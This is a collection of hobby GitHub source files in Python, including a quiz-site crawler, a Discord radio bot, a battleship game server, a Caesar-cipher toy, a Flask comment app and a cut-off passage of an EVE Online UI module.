+{"seq_id":"30911974194","text":"# -*- coding: utf-8 -*-\n\nimport requests\n\nfrom achihuo_mini.async_loop import AsyncLoop\nfrom achihuo_mini.item import Item\nfrom vko_spider.mini_spider.vko_mini_spider import VkoMiniSpider\n\nHEADERS = {\n'Accept-Encoding': 'gzip, deflate',\n'Accept-Language': 'zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4',\n'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.87 Safari/537.36',\n'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',\n'Accept': '*/*',\n'X-Requested-With': 'XMLHttpRequest',\n'Connection': 'keep-alive',\n'Referer': 'http://tiku.vko.cn/',\n}\n\nURL = 'http://tiku.vko.cn/resolve/{}'\n\nclass VkoMiniSpider(AsyncLoop):\n\n NAME = 'vko_mini_spider'\n\n def __init__(self):\n super(VkoMiniSpider, self).__init__(concurrency=30, cache_backend='ssdb')\n\n\ndef make_item(qid):\n url = URL.format(qid)\n item = Item(dict(\n method = 'GET',\n url = url,\n max_retry = 2,\n timeout = 60,\n ))\n return item\n\n\ndef request(qid):\n url = URL.format(qid)\n resp = requests.get(url, headers=HEADERS)\n return resp.text\n\n\ndef find_max_qid():\n min_qid = 1\n max_qid = 1000000\n\n def binary_search(mnq, mxq):\n if mxq - mnq <= 1:\n return mxq\n\n mid = (mxq + mnq) // 2\n print(mid)\n html = request(mid)\n if not html.startswith('null('):\n return binary_search(mnq, mid)\n else:\n return binary_search(mid, mxq)\n\n return binary_search(min_qid, max_qid)\n\n\ndef main():\n loop = VkoMiniSpider()\n\n max_qid = find_max_qid()\n for qid in range(1, max_qid):\n item = make_item(qid)\n loop.add_task('get_question', item, task_name=item.url, repeat=False)\n\n\ndef test():\n max_qid = find_max_qid()\n print('max_qid', max_qid)\n\n\nif __name__ == '__main__':\n main()\n # test()\n","repo_name":"waryhao/Afanti_tiku","sub_path":"vko_spider/mini_spider/vko_add_next_qids.py","file_name":"vko_add_next_qids.py","file_ext":"py","file_size_in_byte":1870,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"13404711758","text":"import json\nimport array\nimport struct\nimport audioop\nimport discord\nimport asyncio\nimport requests\nimport threading\nfrom io import BufferedIOBase, BytesIO\nfrom queue import Queue, Empty as EmptyQueue\nfrom typing import *\nfrom subprocess import Popen, PIPE\nfrom functools import partial\nfrom discord.ext import commands, tasks\nfrom discord.ext.commands import CommandError\n\n\nclass OggVorbisStream:\n\n def __init__(self, file_handle: BufferedIOBase) -> None:\n self.page_iter = self.page_generator(file_handle)\n\n def page_generator(self, file_handle: BufferedIOBase):\n while file_handle.read(4) == b\"OggS\":\n yield OggPage(file_handle)\n\n def get_next_page(self):\n try:\n return next(self.page_iter)\n except StopIteration:\n return None\n\n\nclass OggPage:\n\n ogg_page_struct = struct.Struct(\"=BBQIIIB\")\n\n def __init__(self, file_handle: BufferedIOBase) -> None:\n self.version, self.mode, self.granule, self.serial, self.page_no, self.crc, self.len_seg_table = self.ogg_page_struct.unpack(\n file_handle.read(self.ogg_page_struct.size))\n\n self.seg_table = array.array('B', struct.unpack(\n 'B'*self.len_seg_table, file_handle.read(self.len_seg_table)))\n\n self.data = file_handle.read(sum(self.seg_table))\n\n def convert_to_bytes(self):\n return b\"OggS\" + self.ogg_page_struct.pack(self.version, self.mode, self.granule, self.serial, self.page_no, self.crc, self.len_seg_table) + self.seg_table.tobytes() + self.data\n\n\nclass RadioPlayer(discord.AudioSource):\n \"\"\"The radio player class\"\"\"\n\n def __init__(self, radio_code_name: str, radio_name: str, radio_url: str, radio_format: str, discord_ctx: commands.Context):\n self.radio_code_name = radio_code_name\n self.radio_name = radio_name\n self.radio_url = radio_url\n self.radio_format = radio_format\n\n self.discord_ctx = discord_ctx\n self.event_loop: asyncio.AbstractEventLoop = discord_ctx.bot.loop\n self.last_now_playing_message: discord.Message = None\n\n self._volume = 0.07\n self.audio_queue = Queue()\n\n if self.radio_format == \"direct\":\n ffmpeg_command_line = \"ffmpeg -i {url} -f s16le -ac 2 -ar 48000 pipe:1\".format(\n url=radio_url).split()\n\n self.ffmpeg_process = Popen(\n ffmpeg_command_line, stdout=PIPE, creationflags=0x08000000)\n else:\n ffmpeg_command_line = \"ffmpeg -i pipe:0 -f s16le -ac 2 -ar 48000 pipe:1\".split()\n\n self.ffmpeg_process = Popen(\n ffmpeg_command_line, stdin=PIPE, stdout=PIPE, creationflags=0x08000000)\n # the creationflags part is only if this is running in Windows\n\n # Threading!\n stdin_thread = threading.Thread(\n target=self.stdin_blaster, daemon=True)\n stdin_thread.start()\n stdout_thread = threading.Thread(target=self.drain_stdout, daemon=True)\n stdout_thread.start()\n\n self.setup_auto_disconnect()\n\n def drain_stdout(self):\n stdout: IO = self.ffmpeg_process.stdout\n while True:\n data = stdout.read(3840)\n if not data:\n break\n try:\n self.audio_queue.put(data)\n except AttributeError:\n return\n\n def stdin_blaster(self):\n stdin: IO = self.ffmpeg_process.stdin\n if self.radio_format != \"vorbis\":\n headers = {\"Icy-MetaData\": \"1\"}\n with requests.get(self.radio_url, headers=headers, stream=True) as response:\n response.raise_for_status()\n\n metaint: int = int(response.headers.get(\"icy-metaint\"))\n try:\n data = response.raw.read(metaint)\n while True:\n stdin.write(data)\n\n metadata_block_size = int.from_bytes(\n response.raw.read(1), byteorder=\"little\")\n if metadata_block_size != 0:\n metadata_bytes: bytes = response.raw.read(\n metadata_block_size * 16)\n self.event_loop.create_task(\n self.tell_text_channel_currently_playing(metadata_bytes.decode(\"utf-8\")))\n\n data = response.raw.read(metaint)\n except OSError:\n # ffmpeg closed\n return\n else:\n with requests.get(self.radio_url, stream=True) as response:\n response.raise_for_status()\n\n ogg_stream = OggVorbisStream(response.raw)\n\n page = ogg_stream.get_next_page()\n\n while page:\n if page.data[:7] == b\"\\x03vorbis\":\n metadata = dict()\n\n data_io = BytesIO(page.data)\n\n data_io.read(7)\n\n data_io.read(int.from_bytes(\n data_io.read(4), \"little\", signed=False))\n\n for _ in range(int.from_bytes(data_io.read(4), \"little\", signed=False)):\n separated_metadata = data_io.read(int.from_bytes(\n data_io.read(4), \"little\", signed=False)).decode().split('=')\n metadata[separated_metadata[0].lower()] = \"=\".join(\n separated_metadata[1:])\n\n del data_io\n\n self.event_loop.create_task(self.tell_np_vorbis(metadata))\n\n del metadata\n\n try:\n stdin.write(page.convert_to_bytes())\n except OSError:\n return\n\n page = ogg_stream.get_next_page()\n\n async def tell_np_vorbis(self, metadata: Dict):\n if self.last_now_playing_message:\n await self.last_now_playing_message.delete()\n self.last_now_playing_message = await self.discord_ctx.send(f\"Now playing {metadata['artist']} - {metadata['title']} from {self.radio_name}\")\n\n @property\n def volume(self):\n return self._volume\n\n @volume.setter\n def volume(self, value: float):\n self._volume = min(1.0, value)\n\n def get_current_song_title(self, metadata_string: str):\n \"\"\"Temp func until able to tell what is playing in the text channel\"\"\"\n metadatas = metadata_string.split(\";\")\n for metadata_line in metadatas:\n metadata_line_pair = metadata_line.split(\"=\")\n if metadata_line_pair[0] == \"StreamTitle\":\n # print(\"Currently playing {song_name} in {server_name}\".format(\n # song_name=metadata_line_pair[1].strip(\"'\"), server_name=self.discord_ctx.guild))\n # break\n return metadata_line_pair[1].strip(\"'\")\n\n async def tell_text_channel_currently_playing(self, metadata: str):\n song_name = await self.event_loop.run_in_executor(None, partial(self.get_current_song_title, metadata))\n if self.last_now_playing_message:\n await self.last_now_playing_message.delete()\n self.last_now_playing_message = await self.discord_ctx.send(f\"Now playing {song_name} from {self.radio_name}\")\n\n def setup_auto_disconnect(self):\n @tasks.loop(minutes=5, loop=self.event_loop)\n async def auto_disconnect():\n voice_client: discord.VoiceClient = self.discord_ctx.voice_client\n members: List[discord.Member] = voice_client.channel.members\n if len([member for member in members if not member.bot]) == 0:\n await self.discord_ctx.send(\"Disconnecting due to there is nobody in the VC\")\n voice_client.stop()\n await voice_client.disconnect()\n\n auto_disconnect.start()\n self.auto_disconnect: tasks.Loop = auto_disconnect\n\n def read(self):\n try:\n return audioop.mul(self.audio_queue.get(timeout=15), 2, self._volume)\n except EmptyQueue:\n return b''\n\n def cleanup(self):\n self.auto_disconnect.cancel()\n self.ffmpeg_process.terminate()\n\n del self.auto_disconnect\n del self.audio_queue\n del self.ffmpeg_process\n del self.last_now_playing_message\n\n del self.radio_code_name\n del self.radio_format\n del self.radio_name\n del self.radio_url\n\n\nclass Radio(commands.Cog):\n \"\"\"Radio Cog Class\"\"\"\n\n def __init__(self, bot: commands.Bot):\n self.bot = bot\n\n @commands.Cog.listener()\n async def on_ready(self):\n print(\"Radio Cog is loaded.\")\n\n @commands.command()\n async def radio(self, ctx: commands.Context, radio_code_name: str):\n \"\"\"Command to play a radio\"\"\"\n\n radio_data = await self.bot.loop.run_in_executor(None, partial(Radio.get_radio, radio_code_name))\n\n # There are always 3 element in radio_data, [0] is the url\n # [1] is the format and [2] is the radio name\n\n if not radio_data:\n return await ctx.send(f\"There is no such thing as {radio_code_name}\")\n\n player = await self.bot.loop.run_in_executor(None, partial(RadioPlayer, radio_code_name, radio_data[2], radio_data[0], radio_data[1], ctx))\n\n ctx.voice_client.play(player)\n\n @commands.command()\n async def stop_radio(self, ctx: commands.Context):\n voice_client: discord.VoiceClient = ctx.voice_client\n if voice_client.is_playing():\n voice_client.stop()\n await ctx.send(\"Stopped radio!\")\n\n @commands.command()\n async def radio_volume(self, ctx: commands.Context, volume: int):\n try:\n voice_client: discord.VoiceClient = ctx.voice_client\n voice_client.source.volume = float(volume / 100)\n except AttributeError as e:\n await ctx.send(\"Failed to change volume\")\n raise e\n await ctx.send(f\"Changed volume to {volume}\")\n\n @radio.before_invoke\n async def radio_before_invoke(self, ctx: commands.Context):\n if ctx.voice_client is None:\n if ctx.author.voice:\n await ctx.author.voice.channel.connect()\n print(\n f\"Connected to the {ctx.author}'s voice channel on {ctx.guild} server!\")\n else:\n await ctx.send(\"Please join a VC first!\")\n raise CommandError(\n f\"{ctx.author} tried to summon bot while being outside of VC.\")\n\n # This part is to check if it need to stop the current player\n # or not by checking either if it the user is asking to listen to\n # currently playing radio station or if it is not radio player at all\n elif ctx.voice_client.is_playing():\n if ctx.voice_client.source is RadioPlayer:\n radio_player: RadioPlayer = ctx.voice_client.source\n # check if currently playing station is the same\n # as the one being asked to tuned into\n # ctx.args[2] is the radio_name argument of the radio command\n if radio_player.radio_code_name == ctx.args[2]:\n await ctx.send(f\"Already tuned to {ctx.args[2]}!\")\n raise CommandError(\n f\"User {ctx.author} tried to tune into the currently tuned radio station.\")\n # if we reached here, it means that the source is either some type of other source/player\n # or its a different station, either way, we just stop them\n ctx.voice_client.stop()\n\n @commands.command(aliases=[\"radios\"])\n async def list_all_radio(self, ctx: commands.Context):\n line_format = \"{radio_name} -> {radio_code}\\n\"\n formatted_str = \"\"\n\n radios: Dict = await self.bot.loop.run_in_executor(None, Radio.get_radios)\n\n radio_code: str\n radio_data: List[str]\n for radio_code, radio_data in radios.items():\n formatted_str += line_format.format(\n radio_name=radio_data[2], radio_code=radio_code)\n\n await ctx.send(\n \"```\\n\" +\n formatted_str +\n \"```\"\n )\n\n @staticmethod\n def get_radio(radio_name: str) -> Union[Dict, bool]:\n with open(\"data/radios.json\", 'r') as json_file:\n radios: Dict = json.load(json_file)\n\n try:\n return radios[radio_name]\n except:\n return False\n\n @staticmethod\n def get_radios():\n with open(\"data/radios.json\", 'r') as json_file:\n radios: Dict = json.load(json_file)\n\n return radios\n\n\ndef setup(bot: commands.Bot):\n bot.add_cog(Radio(bot))\n","repo_name":"Naz1337/discord-naz-bot","sub_path":"cogs/radio.py","file_name":"radio.py","file_ext":"py","file_size_in_byte":12703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"32830439153","text":"from enum import Enum\nfrom Core import Node\n\n\nclass TypeOfComp(Enum):\n Res = \"Resistance\"\n Node = \"Node\"\n IndVolt = \"Independent voltage\"\n IndCur = \"Independent Current\"\n\nclass Component():\n def __init__(self, type: TypeOfComp):\n self.__voltage: int = 0\n self.__charge: int = 0\n self.__type = type\n\n @property\n def Type(self):\n return self.__type\n\ndef checkExistanceOfNode(nodeNumber, nodes: dict):\n if nodeNumber in nodes:\n node = nodes[nodeNumber]\n else:\n node = Node.Node(nodeNumber)\n nodes[nodeNumber] = node\n return node\n","repo_name":"daniyalmaroufi/circuit-solver","sub_path":"Core/Component.py","file_name":"Component.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
+{"seq_id":"12274694047","text":"import glob\nimport imp\nimport os.path\n\n\nclass Plugin(object):\n \"\"\"Base class for all plugins.\"\"\"\n\n capability = []\n\n @classmethod\n def is_capable(cls, requested_capability):\n \"\"\"Returns true if the requested capability is supported by this plugin\n \"\"\"\n for c in requested_capability:\n if c not in cls.capability:\n return False\n return True\n\n\ndef get_plugin(cls, requested_capability=None):\n if not requested_capability:\n requested_capability = []\n result = []\n for handler in cls.__subclasses__():\n if handler.is_capable(requested_capability):\n result.append(handler)\n return result\n\n\ndef _import_module(filename):\n (path, name) = os.path.split(filename)\n (name, ext) = os.path.splitext(name)\n\n (file, filename, data) = imp.find_module(name, [path])\n try:\n return imp.load_module(name, file, filename, data)\n finally:\n if file:\n file.close()\n\n_plugin_loaded = False\n\n\ndef load_plugins(config):\n global _plugin_loaded\n if _plugin_loaded:\n return\n _plugin_loaded = True\n\n if not config.has_option('Plugin', 'plugin_directory'):\n return\n directory = config.get('Plugin', 'plugin_directory')\n for file in glob.glob(os.path.join(directory, '*.py')):\n _import_module(file)\n","repo_name":"silveregg/txboto","sub_path":"txboto/plugin.py","file_name":"plugin.py","file_ext":"py","file_size_in_byte":1349,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"}
+{"seq_id":"34962323512","text":"import string\nimport random\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\n\ndef process_word(w):\n w = w.rstrip()\n w2 = [char for char in w if char in string.ascii_letters]\n return \"\".join(w2).upper()\n\nraw_words = random.sample(open(\"/usr/share/dict/words\", \"rt\").readlines(), 100)\nwords = [pw for pw in [process_word(w) for w in raw_words] if pw]\n\n\ndef create_labelname(idx):\n w1 = random.choice(words)\n w2 = \"\" # random.choice(words)\n name = (w1+w2)[:25].upper()\n return name + \".\" + str(idx) + random.choice(string.ascii_uppercase+string.digits)\n\n\nnumber_of_labels = 5000\nlabels = [create_labelname(idx) for idx in range(number_of_labels)]\n\n\ndef hashfunc1(label):\n length = len(label) # assume we know the length of the symbol already\n c0 = ord(label[0])\n c1 = ord(label[1])\n clast = ord(label[length-1])\n return ((c0 + clast + c1*4) ^ (length*4)) & 127\n\n\ndef hashfunc2(label):\n # just sum up all the characters of the label....\n # could be faster / better if you have to scan it anyway to determine the length\n # also seems to work better for shorter labels\n length=len(label)\n return (sum([ord(c) for c in label]) ^ (length*2)) & 127\n\ndef hashfunc3(label):\n # this is the string.hash function in the prog8 string library\n hashcode = 179\n carry = 0\n for c in label:\n newcarry = 1 if hashcode&128 else 0\n hashcode = (hashcode << 1) & 255 | carry\n carry = newcarry\n hashcode ^= ord(c)\n return hashcode\n\n\nif __name__==\"__main__\":\n hash_buckets = [0] * 128\n for lbl in labels:\n hashvalue = hashfunc1(lbl)\n hash_buckets[hashvalue] += 1\n plt.subplots(figsize = (20,5))\n p=sns.barplot(x=list(range(len(hash_buckets))), y=hash_buckets)\n plt.show()\n\n hash_buckets = [0] * 128\n for lbl in labels:\n hashvalue = hashfunc2(lbl)\n hash_buckets[hashvalue] += 1\n plt.subplots(figsize = (20,5))\n sns.barplot(x=list(range(len(hash_buckets))), y=hash_buckets)\n plt.show()\n\n hash_buckets = [0] * 256\n for lbl in labels:\n hashvalue = hashfunc3(lbl)\n hash_buckets[hashvalue] += 1\n plt.subplots(figsize = (20,5))\n sns.barplot(x=list(range(len(hash_buckets))), y=hash_buckets)\n plt.show()\n","repo_name":"irmen/cx16assem","sub_path":"experiment/hashed_syms/hashfunctionstest.py","file_name":"hashfunctionstest.py","file_ext":"py","file_size_in_byte":2259,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"32"}
+{"seq_id":"29418139191","text":"import os\r\n\r\n\r\nos.system('cls')\r\n\r\n\r\n\r\nprint('''\r\n ##################################################\r\n # #\r\n # caesar_encode by : Welson #\r\n # #\r\n ##################################################\r\n\r\n''')\r\n\r\n\r\ndef encode():\r\n print('Starting encode')\r\n print('输入你想要输入的明文' )\r\n txt = input(\">>\")\r\n print('请输入移动位数')\r\n offset = int(input(\">>\"))\r\n\r\n\r\n #考虑用户用的是字符串\r\n result = \"\"\r\n\r\n for t in txt:\r\n n = ord(t)\r\n n = n + offset\r\n t2 = chr(n)\r\n result = result + t2\r\n \r\n print(f'加密后的字符是 {result}')\r\n\r\ndef decode():\r\n print('Starting decode')\r\n print('输入你要解密的密文' )\r\n cipher = input('>>')\r\n print(\"请输入秘钥.\")\r\n key = int(input('>'))\r\n \r\n plain = \"\"\r\n\r\n \r\n for c in cipher:\r\n n = ord(c)\r\n n = n - key\r\n p = chr(n)\r\n plain += p\r\n\r\n print(f'解密后的明文是:{plain}')\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\nrunning = True\r\nwhile running:\r\n print('1.Encode 2.decode 3.Exit')\r\n sel = input(\">>\")\r\n if sel == '1':\r\n encode()\r\n elif sel == '2':\r\n decode()\r\n elif sel == '3':\r\n print(\"Thank you for use this app!\")\r\n running = False\r\n else:\r\n print('请做出正确的选择。 ')\r\n \r\n \r\n","repo_name":"Welsonpeaches/caeser_encode","sub_path":"caesar_encode_decode.py","file_name":"caesar_encode_decode.py","file_ext":"py","file_size_in_byte":1466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"13117134710","text":"import argparse\nfrom distutils.dir_util import copy_tree\n\nparser = argparse.ArgumentParser(\n description='Copy files form one folder to another',\n prog='copy_script'\n)\ndef main():\n parser.add_argument(\n '-s', \n '--source-dir', \n default=\".\",\n help=\"Source directory from where files should be copied\"\n )\n parser.add_argument(\n '-d', \n '--destination-dir', \n default=\".\", \n help=\"Source directory from where files should be copied\"\n )\n args = parser.parse_args()\n if args.source_dir == \".\" and args.destination_dir == \".\" :\n parser.print_help()\n else:\n copy_tree(args.source_dir,args.destination_dir)\n print(f\"Copied files from {args.source_dir} to {args.destination_dir}\")\n\nif __name__ == \"__main__\":\n main()","repo_name":"HubGab-Git/copy_script","sub_path":"python/copy.py","file_name":"copy.py","file_ext":"py","file_size_in_byte":815,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"70454123610","text":"#server\r\n\r\nimport sys\r\nimport player\r\nimport threading\r\nimport traceback\r\nfrom socket import *\r\nimport gameserver as gs\r\nfrom random import randint\r\nimport securedsocket as ss\r\nimport configurationmanager as cm\r\n\r\nPORT = randint(0,5000) \t\t# starts from a random port\r\n\r\n\r\ndef get_new_socket(player_socket):\r\n\tglobal PORT\r\n\tPORT += 1\r\n\tport_min = cm.tcp_server_min_port\r\n\tport_max = cm.tcp_server_max_port\r\n\ttcp_port = (port_min + PORT) % port_max\r\n\r\n\ttemp_socket = socket(AF_INET, SOCK_STREAM)\r\n\ttemp_socket.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)\r\n\r\n\ttry:\r\n\t\tplayer_socket.send(str(tcp_port))\r\n\t\ttemp_socket.bind(('', tcp_port))\r\n\t\ttemp_socket.listen(15)\r\n\t\tnew_player_socket,address = temp_socket.accept()\r\n\texcept socket.timeout:\r\n\t\tprint(\"Socket timeout. Port may have been used recently. wait and try again!\")\r\n\t\treturn None,tcp_port\r\n\texcept:\r\n\t\tprint(\"Socket error. Try again\")\r\n\t\treturn None,tcp_port\r\n\tfinally:\r\n\t\ttemp_socket.close()\r\n\treturn ss.RSASocket(new_player_socket),address\r\n\r\n\r\n# creates a server side player_object\r\ndef prepare_player(player_socket,game_server):\r\n\tname = player_socket.recv(1024)\r\n\tnew_player_socket = None\r\n\twhile not new_player_socket:\r\n\t\tnew_player_socket,new_address = get_new_socket(player_socket)\r\n\r\n\tudp_sending = new_player_socket.recv(1024)\r\n\tnew_player_socket.send(\"ACK\")\r\n\tump_split = udp_sending[1:-1].split(\",\")\r\n\tudp_address_sending = ump_split[0][1:-1],int(ump_split[1])\r\n\r\n\tudp_receiving = new_player_socket.recv(1024)\r\n\tnew_player_socket.send(\"ACK\")\r\n\tump_split = udp_receiving[1:-1].split(\",\")\r\n\tudp_address_receiving = ump_split[0][1:-1],int(ump_split[1])\r\n\r\n\tp = player.Player(name,new_player_socket,new_address,udp_address_sending,udp_address_receiving)\r\n\r\n\tgame_server.add_player(p)\r\n\tplayer_socket.close()\r\n\r\n# to use the UDP socket\r\ndef ping_response():\r\n\tping_socket = socket(AF_INET, SOCK_DGRAM)\r\n\tping_socket.bind(('', cm.udp_ping_port)) # for pinging\r\n\twhile not server_quitting:\r\n\t\tmsg,address = ping_socket.recvfrom(1024)\r\n\t\tif (msg.decode() == \"OPEN\"):\r\n\t\t\tping_socket.sendto(msg,address)\r\n\tping_socket.close()\r\n\r\n\r\n# \r\ndef main():\r\n\tglobal server_quitting \t\t\t\t\t\t\t\t# for the future\r\n\tthreads = []\r\n\tgame_server = None\r\n\r\n\ttry:\r\n\t\tserver_quitting = False\r\n\r\n\t\t# this is to verify if the server is up (UPD)\r\n\t\tt = threading.Thread(target=ping_response)\r\n\t\tt.start()\r\n\t\tthreads.append(t)\r\n\r\n\t\tmaximum_connected = cm.maximum_connected\r\n\t\tserver_socket = socket(AF_INET,SOCK_STREAM)\r\n\t\tserver_socket.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)\r\n\t\tserver_socket.bind(('',cm.tcp_server_port)) \t\t\t\t# game socket\r\n\t\tserver_socket.listen(maximum_connected)\r\n\r\n\t\tchat_socket = socket(AF_INET, SOCK_DGRAM)\r\n\t\tchat_socket.bind(('', cm.udp_server_port))\t\t\t\t\t# chat room socket\r\n\t\tchat_socket = ss.RSASocket(chat_socket)\r\n\r\n\t\t# create the game server\r\n\t\tgame_server = gs.TheGameServer(maximum_connected,chat_socket)\r\n\t\t\r\n\t\t# entry door for incoming players\r\n\t\twhile not server_quitting:\r\n\t\t\tplayersocket, addr = server_socket.accept()\r\n\t\t\tif (not server_quitting):\r\n\t\t\t\tss_socket = ss.RSASocket(playersocket)\r\n\t\t\t\tt = threading.Thread(target=prepare_player,args=(ss_socket,game_server))\r\n\t\t\t\tt.start()\r\n\t\t\t\tthreads.append(t)\r\n\t\t\t\tprint(\"New player registered and waiting for more\")\r\n\t\t\telse: \r\n\t\t\t\t# no more connections allowed\r\n\t\t\t\tplayersocket.send(\"no more connections allowed\".encode())\r\n\t\t\t\tplayersocket.close()\r\n\texcept KeyboardInterrupt:\r\n\t\tif (game_server):\r\n\t\t\tgame_server.quit()\r\n\t\tgame_down = True\r\n\t\tprint(\"Keyboard Interrupt. Time to say goodbye!!!\")\r\n\texcept Exception as e:\r\n\t\tprint(e)\r\n\t\ttraceback.print_exc(file=sys.stdout)\r\n\tfinally:\r\n\t\tfor t in threads:\r\n\t\t\tt.join()\r\n\t\tif (game_server):\r\n\t\t\tgame_server.quit()\r\n\t\tprint(\"Waiting for all active games to finish\")\r\n\tprint(\"The end\")\r\n\tsys.exit(0) \r\n\r\n\r\nif __name__ == \"__main__\":\r\n\tmain()\r\n","repo_name":"gautam-balamurali/Multiplayer-Battleships","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":3808,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
+{"seq_id":"13652689583","text":"# from flask import Flask\n# from flask import request,render_template\nfrom flask_sqlalchemy import SQLAlchemy\nimport sqlite3\nfrom contextlib import closing\nfrom flask import Flask, request, session, g, redirect, url_for, \\\n abort, render_template, flash\nimport parser\n\n# FOllowed\n#https://github.com/mitsuhiko/flask/blob/master/examples/flaskr/flaskr.py\nDATABASE = 'Data/flask.db'\nDEBUG = True\nSECRET_KEY = 'development key'\nUSERNAME = 'admin'\nPASSWORD = 'default'\n\napp = Flask(__name__)\napp.config.from_object(__name__)\napp.config.from_envvar('FLASKR_SETTINGS', silent=True)\n\n\n\"\"\"\nCode to initialize the database\n\"\"\"\ndef init_db():\n with closing(connect_db()) as db:\n with app.open_resource('Data/schema.sql', mode='r') as f:\n db.cursor().executescript(f.read())\n db.commit()\n\n\n\"\"\"\nCode to connect to our database\n\"\"\"\ndef connect_db():\n rv = sqlite3.connect('DATABASE')\n rv.row_factory = sqlite3.Row\n return rv\n # return sqlite3.connect('DATABASE')\n\n\"\"\"\nCode to get our db so we can get entries\n\"\"\"\ndef get_db():\n if not hasattr(g, 'sqlite_db'):\n g.sqlite_db = connect_db()\n return g.sqlite_db\n\n\"\"\"\nCode to close your databse\n\"\"\"\n@app.teardown_appcontext\ndef close_connection(exception):\n if hasattr(g, 'sqlite_db'):\n g.sqlite_db.close()\n\n\n\"\"\"\nLanding page will just have assignments and will render index.html\n\"\"\"\n@app.route('/')\ndef landing():\n svn_list = parser.parse_svn()\n db = get_db()\n cur = db.execute('select title, text from entries order by id desc')\n entries = cur.fetchall()\n return render_template('index.html',svn_list=svn_list[0],svn_log=svn_list[1],entries=entries)\n\n\n\n\"\"\"\niframe redirect page will add comments we will check if the comment\nis a original comment or reply and add to corresponding data base\nwe will also filter and check that naughty words are not being used\n\"\"\"\n@app.route('/add//', methods=['POST'])\ndef add_entry(directory,path):\n db = get_db()\n unique_file = directory + \"-\" + path\n if request.form['text'] == \"\":\n return redirect(url_for('iframe',path=path,directory=directory))\n if request.form['title'] == \"\":\n return redirect(url_for('iframe',path=path,directory=directory))\n\n if request.form['reply'] == \"\":\n title = request.form['title']\n text = request.form['text']\n title,text = filter(request.form['title'],request.form['text'])\n db.execute('insert into entries (title, text,file) values (?, ?, ?)',\n [title, text,unique_file])\n db.commit()\n else:\n title = request.form['title']\n text = request.form['text']\n reply = request.form['reply']\n title,text = filter(request.form['title'],request.form['text'])\n print('This is STUPID')\n db.execute('insert into reply_entries (parent_id,title, text,file) values (?, ?, ?,?)',\n [str(reply),title, text,unique_file])\n db.commit()\n return redirect(url_for('iframe',path=path,directory=directory))\n\n\"\"\"\nFor when you click on a specific assignment\ngives you details about all files in assignment\n\"\"\"\n@app.route('/')\ndef files(files):\n svn_list = parser.parse_svn()\n return render_template('details.html',svn_list=svn_list[0],\n svn_log=svn_list[1],assignment=files)\n\n\n\"\"\"\niframe page will display comments so we will get tables from etnries and reply_entries table\n\"\"\"\n@app.route('//')\ndef iframe(directory,path):\n svn_list = parser.parse_svn()\n db = get_db()\n # filter(request.form['title'],request.form['text'])\n\n db.commit()\n comment = db.execute('select title, text, file,id from entries order by id desc')\n replies = db.execute('select title,text,parent_id from reply_entries order by child_id desc')\n\n entries = comment.fetchall()\n replies = replies.fetchall()\n return render_template('show_entries.html',svn_list=svn_list[0],svn_log=svn_list[1],\n path=path,directory=directory,entries=entries,replies=replies)\n\n\"\"\"\nFilter function will check naught words table and check text and title\nand will replace any naught words\n\"\"\"\ndef filter(title,text):\n db = get_db()\n cur = db.execute('select * from naughty_words')\n replace = cur.fetchall()\n for word in replace:\n if word[0] in title:\n title = title.replace(word[0],word[1])\n if word[0] in text:\n text = text.replace(word[0],word[1])\n return title,text\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"alekfestekjian/WebPortfolio","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"33638891933","text":"#Embedded file name: c:/depot/games/branches/release/EVE-TRANQUILITY/eve/client/script/ui/station/captainsquarters/screenControls.py\nimport blue\nimport trinity\nimport uicls\nimport uiconst\nimport uthread\nimport uiutil\nimport util\nimport math\nimport random\nTIME_BASE = 0.3\n\nclass ScreenWedgeBracketTop(uicls.Transform):\n __guid__ = 'uicls.ScreenWedgeBracketTop'\n default_name = 'ScreenWedgeBracketTop'\n default_hasCorners = True\n default_wedgeWidth = 100\n default_wedgeTopStart = -10\n default_wedgePosRatio = 0.5\n default_align = uiconst.TOTOP\n default_height = 25\n default_rotation = 0.0\n\n def ApplyAttributes(self, attributes):\n global TIME_BASE\n uicls.Transform.ApplyAttributes(self, attributes)\n TIME_BASE = 0.3\n self.hasCorners = attributes.get('hasCorners', self.default_hasCorners)\n wedgeWidth = attributes.get('wedgeWidth', self.default_wedgeWidth)\n wedgeTopStart = attributes.get('wedgeTopStart', self.default_wedgeTopStart)\n self.wedgePosRatio = attributes.get('wedgePosRatio', self.default_wedgePosRatio)\n self.borderLeft = uicls.Frame(parent=self, name='borderLeft', texturePath='res:/UI/Texture/classes/CQMainScreen/borderLeft.png', cornerSize=16, align=uiconst.TOPLEFT, pos=(0, 1, 200, 48), padLeft=2, color=util.Color.WHITE)\n self.wedge = uicls.Frame(parent=self, name='wedge', texturePath='res:/UI/Texture/classes/CQMainScreen/wedge.png', cornerSize=13, align=uiconst.TOPLEFT, pos=(300,\n wedgeTopStart,\n wedgeWidth,\n 27), padding=(-5, 0, -5, 0), color=util.Color.WHITE)\n self.borderRight = uicls.Frame(parent=self, name='borderLeft', texturePath='res:/UI/Texture/classes/CQMainScreen/borderRight.png', cornerSize=16, align=uiconst.TOPRIGHT, pos=(0, 1, 200, 48), 